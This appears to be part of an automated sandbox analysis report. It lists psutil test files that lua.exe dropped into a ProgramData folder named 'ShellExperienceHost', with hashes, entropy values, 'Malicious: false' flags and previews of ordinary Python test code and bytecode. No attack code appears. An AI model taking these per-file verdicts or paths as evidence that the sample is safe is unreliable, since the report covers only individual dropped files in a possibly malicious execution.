Preview:	B.........R`';...................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e...rBd.d.l.Z.d.d.l.Z.d.d.l.m.Z...dd.d...Z d.d...Z!d.d...Z"d.d...Z#d.d ..Z$e..%e...d!..G.d"d#..d#e.....Z&e..%e...d!..G.d$d%..d%e.....Z'e..%e...d!..G.d&d'..d'e.....Z(e)d(k...r.d.d)lm+Z+..e+e,....d.S.)+z.POSIX specific tests......N)...AIX)...BSD)...LINUX)...MACOS)...OPENBSD)...POSIX)...SUNOS)...CI_TESTING)...spawn_testproc)...HAS_NET_IO_COUNTERS)...mock)...PsutilTestCase)...PYTHON_EXE)...retry_on_failure)...sh)...skip_on_access_denied)...terminate)...unittest)...which)...getpagesizec................C...s....d.g.}.t.r.\|...d.....\|.d.k.r0\|...d.t.\|...g.....n.t.s8t.rD\|...d.....n.\|...d.....t.rft.d...}.\|...\|.\|...}.\|...d.\|.g.....t.\|...}.t.r.\|.....}.n.\|.....d.d.....}.g.}

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\tests\__pycache__\test_process.cpython-37.pyc Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	47547
Entropy (8bit):	5.334708721501503
Encrypted:	false
SSDEEP:	768:Zr6O3X+/m3RqG18ss1UjW9sweA9HXzMfRdJFHjTgndbMoq2OZNZg4fkZ7FwjAwpn:gOH+/mhnijyjW+pAFMfR7hTgndbGbZQo
MD5:	90FC3F50F60C6ED4AAF857543DDD6656
SHA1:	BC363B6AFA9D93CD19DC13EBE57EF9950A7FFAEB
SHA-256:	D5B899BFE4292B7BE886AE1EE139FA41CAB7120E8B37E551E68B423919B80C45
SHA-512:	575C56311D83E5D461B671070F73B6401E73FA08C4FB94AA859F2697F63CCEDAE586D14B5EDD6CEF7C7A46191B0EC546AA7296ACC296D9108082EDCCB26D9C97
Malicious:	false
Preview:	B.........R`7....................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l m"Z"..d.d.l m#Z#..d.d.l m$Z$..d.d.l m%Z%..d.d.l m&Z&..d.d.l m'Z'..d.d.l m(Z(..d.d.l m)Z)..d.d.l mZ..d.d.l m+Z+..d.d.l m,Z,..d.d.l m-Z-..d.d.l m.Z...d.d l m/Z/..d.d!l m0Z0..d.d"l m1Z1..d.d#l m2Z2..d.d$l m3Z3..d.d%l m4Z4..d.d&l m5Z5..d.d'l m6Z6..d.d(l m7Z7..d.d)l m8Z8..d.d*l m9Z9..d.d+l m:Z:..d.d,l m;Z;..d.d-l m<Z<..G.d.d/..d/e2..Z=e...r.e..>..d.k...r.G.d0d1..d1e=..Z?G.d2d3..d3e2..Z@eAd4k...r.d.d5lBmCZC..eCeD....d.S.)6z.Tests for psutil.Process class......N)...AIX)...BSD)...LINUX)...MACOS)...NETBSD)...OPENBSD)...OSX)...POSIX)...SUNOS)...WINDOWS)...open_text)...FileNotFoundError)...long)...PY3)...super)...APPVEYOR)...call_until)...CI_TES

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\tests\__pycache__\test_sunos.cpython-37.pyc Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1507
Entropy (8bit):	5.4432236421868865
Encrypted:	false
SSDEEP:	24:ZLPazc2I3UFjoX1cz4caMBOxcVFF7UXb1Tl5kOMR+irrxRxWMY7UEKCeZOvBIgPW:pnciMqczF7UBM/REWZxgPSr
MD5:	6ED28D8467DC55E8EB9332A3AA671C74
SHA1:	8D5C9613974638CB851D0EA319071C46698069D9
SHA-256:	3B7ACE16CA02C87B99EDDF41D29B4C4EC50B06B56937077C6C513693D5434E50
SHA-512:	FEC3D201222C2F73B0AA609C90DED92CB65DA2AA9BF16A4856795DFB7374746EC2E19AE89177867712344BEA59AEF655BB981A4A485037966234309DBBC4ED72
Malicious:	false
Preview:	B.........R`G....................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e...e...d...G.d.d...d.e.....Z.e.d.k.r~d.d.l.m.Z...e.e.....d.S.).z.Sun OS specific tests......N)...SUNOS)...PsutilTestCase)...sh)...unittestz.SUNOS onlyc................@...s....e.Z.d.Z.d.d...Z.d.d...Z.d.S.)...SunOSSpecificTestCasec................C...s....t.d.t.j.d.......}.\|.......d...d.d.....}.\|.s4t.d.....d...}.}.xL\|.D.]D}.\|.....}.\|.d.d.....\.}.}.\|.t.t.\|...d.....7.}.\|.t.t.\|...d.....7.}.qBW.\|.\|...}.t.....}.\|...\|.j.\|.....\|...\|.j.\|.....\|...\|.j.\|.....d.S.).Nz#env PATH=/usr/sbin:/sbin:%s swap -l..PATH........z.no swap device(s) configuredr.........i....).r......os..environ..strip..split..ValueError..int..psutilZ.swap_memory..assertEqual..total..used..free)...self..out..linesr....r......line..t..fr....Z.psutil_swap..r.....<D:\python-3.7.3\Lib\site-packages\psutil/tests/test_sunos.py..test_swap_memory....s..................................z&SunOSSpecificTestCase.test_swap_memoryc....

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\tests\__pycache__\test_system.cpython-37.pyc Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	27617
Entropy (8bit):	5.384347422852841
Encrypted:	false
SSDEEP:	768:rPkthldLRXsJ8vMwmdLoSgpDE+QiVvZqZ1:w5LRi8UwmdLoSoI+aH
MD5:	133FD7DEA3EA5044E18B9E3428D3E068
SHA1:	D76CC8EFCE39EF777C36C07E9B0D88F287A898D9
SHA-256:	88F0E630EC590D939E23EB96BD5E0697BF6F2597575DC706C30DE6D33B1A495E
SHA-512:	58327BCEB836D47424259F047884AEE16C2B3E1CEA177C794F34D498BF706438C2CDE3615F38CFBE29823B65166B157BA7C39F8BF9C74DCEBACD58F0B78CBD25
Malicious:	false
Preview:	B.........R`.....................@...sz...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m Z ..d.d.l.m!Z!..d.d.l.m"Z"..d.d.l.m#Z#..d.d.l.m$Z$..d.d.l.m%Z%..d.d.l.m&Z&..d.d.l.m'Z'..d.d.l.m(Z(..d.d.l.m)Z)..d.d.l.mZ..d.d l.m+Z+..d.d!l.m,Z,..d.d"l.m-Z-..d.d#l.m.Z...G.d$d%..d%e)..Z/G.d&d'..d'e)..Z0G.d(d)..d)e)..Z1G.d*d+..d+e)..Z2G.d,d-..d-e)..Z3G.d.d/..d/e)..Z4G.d0d1..d1e)..Z5e6d2k...rvd.d3l7m8Z8..e8e9....d.S.)4z.Tests for system APIS......N)...AIX)...BSD)...FREEBSD)...LINUX)...MACOS)...NETBSD)...OPENBSD)...POSIX)...SUNOS)...WINDOWS)...FileNotFoundError)...long)...ASCII_FS)...check_net_address)...CI_TESTING)...DEVNULL)...enum)...GLOBAL_TIMEOUT)...HAS_BATTERY)...HAS_CPU_FREQ)...HAS_GETLOADAVG)...HAS_NET_IO_COUNTERS)...HAS_SENSOR

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\tests\__pycache__\test_testutils.cpython-37.pyc Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	16647
Entropy (8bit):	5.096291123804144
Encrypted:	false
SSDEEP:	384:NAJjm9pWQWQq2AFT4ylWrVO0hMXJyAiBO9K:N0K9Yn2AFT4ylShMXJ/AO9K
MD5:	7FD3CA63286AF97EADF157B5D043A8DF
SHA1:	4B06BAF717761A75C8FA3E483C0B85C3245FCABA
SHA-256:	E1C2735CCC4D78CB1FDC3FB2E7BB065E3A6517DE774C67E13542294D150B5F93
SHA-512:	A3E9DF9A564C730F0F4DBA215C17E5457BDD6C2808BE139869DBC688EBF983E32C89AA557976C9277D172AE3755A9FD3AC0492FE08AB79668A3A55BE0E1B66DB
Malicious:	false
Preview:	B.........R`T8...................@...s~...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m Z ..d.d.l.m!Z!..d.d.l.m"Z"..d.d.l.m#Z#..d.d.l.m$Z$..d.d.l.m%Z%..d.d.l.m&Z&..d.d.l.m'Z'..d.d l.m(Z(..d.d!l.m)Z)..d.d"l.mZ..d.d#l.m+Z+..d.d.l.Z.d.d.l.Z.G.d$d%..d%e...Z,G.d&d'..d'e...Z-G.d(d)..d)e...Z.G.d*d+..d+e...Z/G.d,d-..d-e...Z0e#G.d.d/..d/e'....Z1G.d0d1..d1e...Z2G.d2d3..d3e...Z3e4d4k...rzd.d5l5m6Z6..e6e7....d.S.)6z3.Tests for testing utils (psutil.tests namespace).......N)...FREEBSD)...NETBSD)...POSIX)...open_binary)...open_text)...supports_ipv6)...bind_socket)...bind_unix_socket)...call_until)...chdir)...CI_TESTING)...create_sockets)...get_free_port)...HAS_CONNECTIONS_UNIX)...is_namedtuple)...mock)...process_namespace)...Psu

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\tests\__pycache__\test_unicode.cpython-37.pyc Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	11038
Entropy (8bit):	5.477732822280441
Encrypted:	false
SSDEEP:	192:CONXsup2A/4+bKAu6UmQcwGN3+acn5zlVNTUzXzdF8k9QkFXyzjEulhAK779+9En:C68up2H+bKAupmQLekxvgjdF19rFXJuN
MD5:	2AE29418C5929B848BC016A8A99DB6FF
SHA1:	CC758E33E5193AFDE268EEE28314B19A85FA2811
SHA-256:	3E7AF8EDB72AF59AC2FB9C87F242624C8D356D66329B8DBD9AFDFE2E224F1855
SHA-512:	CE56B9910D7655AC604900F40F1D43304E2F81F611971CF8ACBA2C83C6EA467D60A9D4E7D7E641EA8CB65D3207A72DCB21856328DBF4F246D4B4672FC9272BBF
Malicious:	false
Preview:	B.........R`.0...................@...s<...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m Z ..d.d.l.m!Z!..d.d.l.m"Z"..d.d.l.m#Z#..d.d.l.m$Z$..d.d.l.m%Z%..d.d l.m&Z&..d.d.l.Z.e...r.d!d"..Z.d#d$..Z'G.d%d&..d&e...Z(e e&.)e.d'..e&.)e...o.e...d(..G.d)d..de(........Ze&.)e.d+..G.d,d-..d-e....Z+G.d.d/..d/e(..Z,e-d0k...r8d.d1l.m/Z/..e/e0....d.S.)2a:....Notes about unicode handling in psutil.======================================..Starting from version 5.3.0 psutil adds unicode support, see:.https://github.com/giampaolo/psutil/issues/1040.The notes below apply to any API returning a string such as.process exe(), cwd() or username():..* all strings are encoded by using the OS filesystem encoding. (sys.getfilesystemencoding

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\tests\__pycache__\test_windows.cpython-37.pyc Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	28587
Entropy (8bit):	5.334078394528294
Encrypted:	false
SSDEEP:	768:oBAP0pQpRf1EfUXGquv+Mq+eMnFelu3iOIbVz1D4rrhFDkfpsG9O:oBrpzdvNbFA311erkfpVE
MD5:	5EF532261EACE3063B29201A12A97736
SHA1:	B56C600C5D9B110A0B9AAA58C5FEDBF8CE906C10
SHA-256:	660D647914BED9C93ACAF49504220C90F027D63A3CEA07CC4F2E5C7A4B99F77F
SHA-512:	B67D05445B84435430CFFA0B8C50C9A772A2863D4DE1FCAB09C7B6C56ACCE60F601C94A2CF7246AA4E4C4073FE66404A713E0053A4684B48D98791D36540730A
Malicious:	false
Preview:	B.........R`M....................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e...rze...sze.. ...0..e..!d.....d.d.l"Z"d.d.l#Z#d.d.l$Z$d.d.l%Z%W.d.Q.R.X.e.j&j'Z'd.d...Z(e..)e...d...e..)e.d...e..)e...o.e...d...G.d.d...d.e.........ZG.d.d...d.e..Z+G.d.d...d.e..Z,G.d d!..d!e..Z-G.d"d#..d#e..Z.G.d$d%..d%e..Z/e..)e...d...G.d&d'..d'e.....Z0e..)e...d...G.d(d)..d)e.....Z1e..)e...d...G.d*d+..d+e.....Z2e3d,k...r.d.d-l4m5Z5..e5e6....d.S.).z.Windows specific tests......N)...WINDOWS)...FileNotFoundError)...super)...APPVEYOR)...GITHUB_ACTIONS)...HAS_BATTERY)...IS_64BIT)...mock)...PsutilTestCase)...PY3)...PYPY)...retry_on_failure)...sh)...spawn_testproc)...terminate)...TOLERANCE_DISK_USAGE)...unittest..ignorec....................s...

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\tests\runner.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	11332
Entropy (8bit):	4.535850511198399
Encrypted:	false
SSDEEP:	192:2EdUP9J0DgrmdIkWzrlTQmzftDbD3LOLufM:2EdUPk0kWl8mzfJbD3aLuU
MD5:	65D15D318D15E4C0A20420071583823E
SHA1:	9C475AA073725BECFDA674C803AADD6D8BCB16C4
SHA-256:	6968819F332E1F8D9D1807A87D1B8E8260CF732288F58AF4BB53C8E072C33CE1
SHA-512:	0B3ADFEC06B18036CD252B850C0245EACA5DE93AB8203BE348538F2A5DF41B14A03CC9F63F1C55199DC4F5806E080EE5F326610BA524EDC73AAF55A649BDDDBD
Malicious:	false
Preview:	#!/usr/bin/env python3..# Copyright (c) 2009, Giampaolo Rodola'. All rights reserved..# Use of this source code is governed by a BSD-style license that can be.# found in the LICENSE file...""".Unit test runner, providing new features on top of unittest module:.- colourized output.- parallel run (UNIX only).- print failures/tracebacks on CTRL+C.- re-run failed tests only (make test-failed)..Invocation examples:.- make test.- make test-failed..Parallel:.- make test-parallel.- make test-process ARGS=--parallel."""..from __future__ import print_function.import atexit.import optparse.import os.import sys.import textwrap.import time.import unittest.try:. import ctypes.except ImportError:. ctypes = None..try:. import concurrencytest # pip install concurrencytest.except ImportError:. concurrencytest = None..import psutil.from psutil._common import hilite.from psutil._common import print_color.from psutil._common import term_supports_colors.from psutil._compat import super.from psu

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\tests\test_aix.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4526
Entropy (8bit):	4.7384253565050845
Encrypted:	false
SSDEEP:	48:k0Pa1x3EgoRZfL5eISLdN/75Nz6NvjhwkjrPOor7OSISDjv/85e2LVqlfPDAMtf5:ltHO4blj1ISXkFVqHaFBanGaTaF3sd1
MD5:	015B19D95558FA6F5D8C7395BA5BC8FA
SHA1:	D6B2CBFFF680C7CFD2E0BD290183BB19CF06C579
SHA-256:	AFBF0F05ACCC7656A08A9DED9D6759212E87C503538AB13D73C196A8F91C293C
SHA-512:	7036E0FD37BDA9E9FC7B5F3B8DE118A72A2077856CD75DF996885ADB4868C3EB4968BA299A8CD062281842EFB20D65C855C08156D1516BBF96BDA85248BF7D38
Malicious:	false
Preview:	#!/usr/bin/env python3..# Copyright (c) 2009, Giampaolo Rodola'.# Copyright (c) 2017, Arnon Yaari.# All rights reserved..# Use of this source code is governed by a BSD-style license that can be.# found in the LICENSE file..."""AIX specific tests."""..import re..from psutil import AIX.from psutil.tests import PsutilTestCase.from psutil.tests import sh.from psutil.tests import unittest.import psutil...@unittest.skipIf(not AIX, "AIX only").class AIXSpecificTestCase(PsutilTestCase):.. def test_virtual_memory(self):. out = sh('/usr/bin/svmon -O unit=KB'). re_pattern = r"memory\s". for field in ("size inuse free pin virtual available mmode").split():. re_pattern += r"(?P<%s>\S+)\s+" % (field,). matchobj = re.search(re_pattern, out).. self.assertIsNotNone(. matchobj, "svmon command returned unexpected output").. KB = 1024. total = int(matchobj.group("size")) KB. available = int(matchobj.group("available")) * K

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\tests\test_bsd.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	20695
Entropy (8bit):	4.659556550636568
Encrypted:	false
SSDEEP:	384:2lbEcesTJCiC2v5TYjLS8x5L4TdI27VUFhefCukeIX+fQL6Q/xz4d1:dc1a2vRYXS8xh4TS0VUFhefXkey+fQLE
MD5:	DC3223DE9A09793A2872C5A63071DBCE
SHA1:	F07F3F8DC8C0AC9A47239B9451773F1E0464A7D7
SHA-256:	DED4C55489265D91641F2685C9DB26247FFE96C0049351EE0008B7F8B8011893
SHA-512:	348300B1CB68512591327D6708F89DBB2FF154C9A64424FD960B66D32C7B5CDFAB29AEDD7ED00CCF2FE637D704D54369B071C4086014F160B0AB93EDE09E5302
Malicious:	false
Preview:	#!/usr/bin/env python3..# Copyright (c) 2009, Giampaolo Rodola'. All rights reserved..# Use of this source code is governed by a BSD-style license that can be.# found in the LICENSE file...# TODO: (FreeBSD) add test for comparing connections with 'sockstat' cmd...."""Tests specific to all BSD platforms."""...import datetime.import os.import re.import time..import psutil.from psutil import BSD.from psutil import FREEBSD.from psutil import NETBSD.from psutil import OPENBSD.from psutil.tests import spawn_testproc.from psutil.tests import HAS_BATTERY.from psutil.tests import PsutilTestCase.from psutil.tests import retry_on_failure.from psutil.tests import sh.from psutil.tests import TOLERANCE_SYS_MEM.from psutil.tests import terminate.from psutil.tests import unittest.from psutil.tests import which...if BSD:. from psutil._psutil_posix import getpagesize.. PAGESIZE = getpagesize(). # muse requires root privileges. MUSE_AVAILABLE = True if os.getuid() == 0 and which('muse') else

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\tests\test_connections.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	21434
Entropy (8bit):	4.522757721773301
Encrypted:	false
SSDEEP:	192:2mRimn5Rpi5j5mLHhf3X3RQ89MG8z5f7JyeJiEtJJYacC6IdM8G7rCtQrLwMkJ0r:2mHnQ5U51odhFiIC8G7rz/7kJ0GuXd1
MD5:	8003C6498D574A3851675F57157CFDCD
SHA1:	A28D283727CC4B3040F0FCA4460F55C4693209F3
SHA-256:	FB8A63C6D2465A86E389D58492E105212ED21C0E5E5EF11CAE3D8C1B9D45A9BF
SHA-512:	569F73D7CCF09F718068EC8FC8389194ADDCDB399E36BD9DA118FE36DAC2C81EE62DA70BF3A60FC624CD3E0202F9F0431B7D66B279B6BD7D66DD0D1DEE88BD69
Malicious:	false
Preview:	#!/usr/bin/env python3..# Copyright (c) 2009, Giampaolo Rodola'. All rights reserved..# Use of this source code is governed by a BSD-style license that can be.# found in the LICENSE file..."""Tests for net_connections() and Process.connections() APIs."""..import os.import socket.import sys.import textwrap.from contextlib import closing.from socket import AF_INET.from socket import AF_INET6.from socket import SOCK_DGRAM.from socket import SOCK_STREAM..import psutil.from psutil import FREEBSD.from psutil import LINUX.from psutil import MACOS.from psutil import NETBSD.from psutil import OPENBSD.from psutil import POSIX.from psutil import SUNOS.from psutil import WINDOWS.from psutil._common import supports_ipv6.from psutil._compat import PY3.from psutil.tests import AF_UNIX.from psutil.tests import bind_socket.from psutil.tests import bind_unix_socket.from psutil.tests import check_connection_ntuple.from psutil.tests import create_sockets.from psutil.tests import HAS_CONNECTIONS_UNIX.from

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\tests\test_contracts.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	27097
Entropy (8bit):	4.573540065545182
Encrypted:	false
SSDEEP:	768:rek3itiplsJAt7/PUlKYvHuTtdJqR3Jud1:rr3tWVG
MD5:	0F55AA4FC6A3702920CF86F865D40F90
SHA1:	F1DD01E7F2D4EBC0666C8D812E08F67B65FF479B
SHA-256:	203E7F2BF1B09502D8259765DC16D9715F99727A6DC257CDC78DA633B6B9F0A9
SHA-512:	38D02166375F5A3682395F6525071C8EF0A1B2D98D570F30F634052FB6E9BE483C3172E36E3A3C98600F18D6726F97CAFF7901452232AE3DC4A9062F3651C476
Malicious:	false
Preview:	#!/usr/bin/env python3..# Copyright (c) 2009, Giampaolo Rodola'. All rights reserved..# Use of this source code is governed by a BSD-style license that can be.# found in the LICENSE file..."""Contracts tests. These tests mainly check API sanity in terms of.returned types and APIs availability..Some of these are duplicates of tests test_system.py and test_process.py."""..import errno.import multiprocessing.import os.import signal.import stat.import sys.import time.import traceback..from psutil import AIX.from psutil import BSD.from psutil import FREEBSD.from psutil import LINUX.from psutil import MACOS.from psutil import NETBSD.from psutil import OPENBSD.from psutil import OSX.from psutil import POSIX.from psutil import SUNOS.from psutil import WINDOWS.from psutil._compat import FileNotFoundError.from psutil._compat import long.from psutil._compat import range.from psutil.tests import APPVEYOR.from psutil.tests import check_connection_ntuple.from psutil.tests import CI_TESTING.from psut

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\tests\test_linux.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	89802
Entropy (8bit):	4.52985514802331
Encrypted:	false
SSDEEP:	1536:Ww69wkIHXWWFJtWgxIdr1mgwAdBAMK9FgwoamkjQ2k5hcEsN:wcHXWWFJtWgxIdr1mg1dBAMK9FgwoamY
MD5:	0FC283189C0EB8CB17DEBFB51DD8398A
SHA1:	1706C27CC9B5CAC79543E1FF01A8A40F6C7063A8
SHA-256:	8C488F0F98120AB52214EBDABBEB119DC3CEDD2B5EB68225C4F25C6336AB4DAB
SHA-512:	C55D8839358CEC1C29FAEF292BEB4D89EE17B36BFEA0722BDF293FFBF635A5EA8CB0985A47ADF86EA31233CB9ECE537F3C50C71FDB89ED7C54D79DC906A6B48F
Malicious:	false
Preview:	#!/usr/bin/env python3..# Copyright (c) 2009, Giampaolo Rodola'. All rights reserved..# Use of this source code is governed by a BSD-style license that can be.# found in the LICENSE file..."""Linux specific tests."""..from __future__ import division.import collections.import contextlib.import errno.import glob.import io.import os.import re.import shutil.import socket.import struct.import textwrap.import time.import warnings..import psutil.from psutil import LINUX.from psutil._compat import basestring.from psutil._compat import FileNotFoundError.from psutil._compat import PY3.from psutil._compat import u.from psutil.tests import call_until.from psutil.tests import GLOBAL_TIMEOUT.from psutil.tests import HAS_BATTERY.from psutil.tests import HAS_CPU_FREQ.from psutil.tests import HAS_GETLOADAVG.from psutil.tests import HAS_RLIMIT.from psutil.tests import mock.from psutil.tests import PsutilTestCase.from psutil.tests import PYPY.from psutil.tests import reload_module.from psutil.tests impor

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\tests\test_memleaks.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	14796
Entropy (8bit):	4.761920246177457
Encrypted:	false
SSDEEP:	192:2L7aD61BN0QLHrilCSD5Hu1JUaluDD1U4VOQn75WViPQUsiIdWDtaa+iPpvDhOn4:26W1kLm+VNPyEtHvd1
MD5:	6ED26E33EAE96149C78C105D6F4EA2FA
SHA1:	046D8D5608EF14EEE4ED532CE6B64A279D870388
SHA-256:	B433F8A683D0782757703E436B2434B8B6FBD58CBF6E4D1094860D74197E7A6B
SHA-512:	9CFDA838B0F1CF8686D05B9BFF6B9A13E0E97CA35A798722A8206836F212A6C05526DC0ACA01DF2B3063E04F7F617196993E5FC9D53B34FEB9493F2E57A78352
Malicious:	false
Preview:	#!/usr/bin/env python3..# Copyright (c) 2009, Giampaolo Rodola'. All rights reserved..# Use of this source code is governed by a BSD-style license that can be.# found in the LICENSE file...""".Tests for detecting function memory leaks (typically the ones.implemented in C). It does so by calling a function many times and.checking whether process memory usage keeps increasing between.calls or over time..Note that this may produce false positives (especially on Windows.for some reason)..PyPy appears to be completely unstable for this framework, probably.because of how its JIT handles memory, so tests are skipped.."""..from __future__ import print_function.import functools.import os..import psutil.import psutil._common.from psutil import LINUX.from psutil import MACOS.from psutil import OPENBSD.from psutil import POSIX.from psutil import SUNOS.from psutil import WINDOWS.from psutil._compat import ProcessLookupError.from psutil._compat import super.from psutil.tests import create_sockets.fr

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\tests\test_misc.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	28584
Entropy (8bit):	4.656047631985949
Encrypted:	false
SSDEEP:	384:/JJBbcbbtOrrV3+xmVNVbxFy/v4Ncr3eBc621FMd1:xzxconFCv4Ncr3eBc621FMd1
MD5:	9F0CF4A04F14D29F5A3C23677D32BF48
SHA1:	AD6337A4246274F36BD54A205AFECBFAB418E48C
SHA-256:	2B207FFF97CFF0BC2DE7B662AE91645AD3DADE9B17F52E43F73250211D9D165F
SHA-512:	1FF977EAE4B67E7FC436F31223F738B909B6374690E9588B69755060F554A2DEF425C32018B420FEE0ED6B65E2F3C29161F5E3673D74D63F4747FDB9D2DEA419
Malicious:	false
Preview:	#!/usr/bin/env python3.# -- coding: utf-8 --..# Copyright (c) 2009, Giampaolo Rodola'. All rights reserved..# Use of this source code is governed by a BSD-style license that can be.# found in the LICENSE file...""".Miscellaneous tests.."""..import ast.import collections.import errno.import json.import os.import pickle.import socket.import stat.import sys..from psutil import LINUX.from psutil import POSIX.from psutil import WINDOWS.from psutil._common import memoize.from psutil._common import memoize_when_activated.from psutil._common import supports_ipv6.from psutil._common import wrap_numbers.from psutil._compat import PY3.from psutil.tests import APPVEYOR.from psutil.tests import CI_TESTING.from psutil.tests import HAS_BATTERY.from psutil.tests import HAS_MEMORY_MAPS.from psutil.tests import HAS_NET_IO_COUNTERS.from psutil.tests import HAS_SENSORS_BATTERY.from psutil.tests import HAS_SENSORS_FANS.from psutil.tests import HAS_SENSORS_TEMPERATURES.from psutil.tests import import_modu

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\tests\test_osx.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7550
Entropy (8bit):	4.69867073256662
Encrypted:	false
SSDEEP:	192:2LB3qb7sPgQFDcKCj7AAT5PQI6dEz2wyzcbAsd1:2LBeCCjplACzPDd1
MD5:	75161E3EEEFF1160377AF4C597E3C3BE
SHA1:	EF85EC39C425B28E8159A6BEB06AB6ABDF225473
SHA-256:	3C041FE3D1D488DF27D032A651609709A115FB6876D26D637AE2D7F39A71B20F
SHA-512:	F7E9D039289613F2BBB6D02ED60043C3F4926C05503AEF9F7485F3D0A7E77F60761DEDA30C193E17D07BF3BB1A244561D3A2D252E85FDD5F8974294224377D5B
Malicious:	false
